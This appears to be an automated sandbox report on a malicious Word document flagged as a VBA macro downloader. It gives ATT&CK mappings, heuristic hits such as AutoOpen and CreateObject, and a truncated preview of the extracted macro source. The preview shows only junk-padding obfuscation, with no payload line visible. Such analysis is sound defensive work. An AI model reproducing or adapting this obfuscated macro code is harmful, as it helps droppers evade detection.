Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and uses CreateObject, a common technique for executing arbitrary code. ClamAV identifies this as a VBSDownloader, suggesting the macro's purpose is to download and execute a secondary payload. No specific family could be identified, but the behavior is consistent with macro-based malware.
Heuristics (7)

- ClamAV: Doc.Macro.VBSDownloader-6336817-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11458 bytes |

SHA-256: 493627d5bb96b264de44e0b71334afef282bfacfb920136c126bb351f78869e2

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function YyZXNSWW()
mvmkmcrXG = 2580
Dim WLneuCcWTb(2580)
WLneuCcWTb(1141) = WAYLRBfW
WLneuCcWTb(1308) = rPSAtLfF
WLneuCcWTb(1724) = VHhfxRhS
WLneuCcWTb(1372) = fWVVwagfn
WLneuCcWTb(1837) = rnzMzpKcZa
WLneuCcWTb(1383) = fKXzcWU
ensUCNzcS = "FfMvmwLnME"
nNPuMCvarUs = "XpzLNBWa"
UAePapVDmf = "SkMDfPacp"
dtRtVXTv = "XvRuWTmVu"
PayckKTHYpE = "TGcTacwxcFa"
WENVNALy = "nmbtUNT"
UEkMFBdxcE = "aYpEFNNTuT"
XByaLdggu = "VHBTaRAbWmh"
pyBeWzZRp = "fhNDtHb"
GKaPYuEX = "DcrNDMm"
WuYmpYWYV = "LteTUFgT"
sTYxXGhDW = "rstgFvWe"
veKmACGRPt = "UymkVNXF"
APLVyzE = "ABycpHCnpn"
EwyFMUU = "ynsEFDLWwNs"
DRFDZpxZ = "GssunKv"
RCFbaEE = "avzMCrkThn"
NSEsaTXP = "LPDwLeS"
End Function
Function PsmGkeWTG()
vTKysDXMKMK = 1454
Dim EuGRzPaE(1454)
EuGRzPaE(249) = rKUSExNwmGc
EuGRzPaE(169) = TMPgZmG
EuGRzPaE(368) = CTLKrxYeKCC
EuGRzPaE(377) = mMsxmRF
EuGRzPaE(1128) = paBTeDVtG
EuGRzPaE(1173) = AWLhYgkM
EuGRzPaE(257) = sEnRtnra
EuGRzPaE(1211) = nVmHnZLn
EuGRzPaE(865) = tYUvUMCu
KkbDCHfg = "AHcUzLsC"
AxXeptR = "FFbHNLhbeUz"
kxTDRet = "KamvBLaXX"
zhDBFKEe = "bafMnYUHM"
zUGvTMVk = "wxtwgms"
GLzWZhLHmt = "txFMZny"
End Function
Function UFDSXgbG()
DwZDrbHgMB = 9043
Dim MCmBCVMBWFt(9043)
MCmBCVMBWFt(2014) = rspRFKEcDE
MCmBCVMBWFt(2045) = kDLNPnU
MCmBCVMBWFt(2513) = vhvTPLfC
MCmBCVMBWFt(7044) = VSHBdCYa
MCmBCVMBWFt(4323) = cszHaweMAg
MCmBCVMBWFt(295) = dsrMdVTbb
MCmBCVMBWFt(4492) = kPxXLdkfF
MCmBCVMBWFt(4495) = PswLFVBRk
MCmBCVMBWFt(8765) = MwEuvMbbreu
WDtXAvCMLh = "ZcVtSVvD"
bHMhkrruH = "wkxcfxGh"
wYcTHZDKFN = "SWFyFsMBbz"
LmhutsBSfa = "bHvWaLMm"
zxxmbhyWBKc = "ekrgRGLWck"
AbGeKGBsy = "WNBAknHc"
EWPYmUCAxK = "nkuhCfWyTsZ"
abcEMEuGtt = "rhwMtPCpR"
HaYAExS = "NUZaxvNNp"
PXHxbcUYwrY = "XvDbNnaNZVp"
BSavtbb = "ddGmCBZeuea"
NFksZTWym = "pasFYkwmGu"
vYZSRYBS = "NVeHWxWM"
FZwMHzEUxDV = "TpnsZRVNsp"
GFeZYLDY = "wTXLCAMzutT"
ekRzLByhcu = "kGkLNAh"
LUHaVBBrrKf = "TXVYScaPR"
pspnLeh = "UmDauVt"
NEFLRGNz = "ScavNrTX"
vRBHwVgpX = "KukUpfrGct"
xzTLpBhsPg = "suNAuGKEz"
uvyBrKwwXd = "kywrBHM"
AbCekde = "znpWnWu"
LAHvhKp = "FskkTyBm"
End Function
Function CPeYTxkYr()
yTDXCECe = 320
Dim LBTVLpzEL(320)
LBTVLpzEL(311) = yYUArfxx
LBTVLpzEL(148) = XWeNsWTVN
LBTVLpzEL(108) = CanNWhkM
LBTVLpzEL(105) = vHhfEgxfPF
LBTVLpzEL(166) = RNMRfUHBzfx
LBTVLpzEL(255) = umNYVRv
LBTVLpzEL(299) = hPAKYEFA
LBTVLpzEL(105) = sEsMvNhcGw
LBTVLpzEL(293) = BuzWLygDkE
LBTVLpzEL(303) = sTvbafh
vnzbksXpk = "vrwusTmtagN"
ePCNUaPbGVp = "xPDFaevfU"
YLxWaMTx = "TGUSUyUvztS"
VNWZuCaD = "HBruHMYf"
RDgterWAL = "dKSGWkpkbv"
DDTrYtWzzG = "xhEbCPD"
wDyHMsezCd = "ZpbMYNwAhr"
HamMfYA = "MnfnLfEBe"
zZdpGckh = "mAnPctrMR"
kTsndRVbBEu = "skdcZrGHy"
XrrhthNk = "XXYfDVN"
WHkxzBaNpXL = "DgweApPk"
uSwYXrM = "cpsnMhFuP"
CvnkXDZbX = "MdwUCWGuAM"
XFRNFtnfEEh = "wpZWvfZNVTf"
xNLfmHzz = "xPycvdvPDsp"
ZSSKKtZa = "HfUmDaNrB"
WAmKSXnM = "GAdUEdxktET"
sdxUWUNU = "DXZnLWCkLba"
mTptMedkDdb = "ZyxZXeUAE"
BnCWzvheyh = "hkHgsHDEGam"
sGKbSfx = "bwkdwWNsy"
fnCBybFru = "pbaMgavVLt"
ztHLKPYGF = "sLCKtkRMYc"
zBuXfczZ = "ZmFAedRVpY"
FxGbBVBxVT = "PnmnpnTRtbV"
dRWBcdXE = "NEnrGev"
End Function
Function yZWFtVMPVhF()
UYGTvucpx = 4293
Dim mdYKBBszM(4293)
mdYKBBszM(2154) = XwcDBeWmWxT
mdYKBBszM(4238) = KWttKfBwzk
mdYKBBszM(2032) = zCgcPvLSpRa
mdYKBBszM(1087) = CtZnXpZbU
mdYKBBszM(953) = WhAKKtV
mdYKBBszM(198) = FdSetNEC
mdYKBBszM(885) = xrKsEBDyae
mdYKBBszM(2830) = LZFUfXBaaN
mdYKBBszM(3853) = rmrrguK
mdYKBBszM(55) = aTUzdVUast
mdYKBBszM(1072) = ScPgDRrKDKc
mdYKBBszM(344) = yaGwLtFYPXr
mdYKBBszM(1720) = yVShadwZdu
mdYKBBszM(723) = pSSYXVg
mdYKBBszM(1513) = yxMzLEssN
mdYKBBszM(3 ... (truncated)
```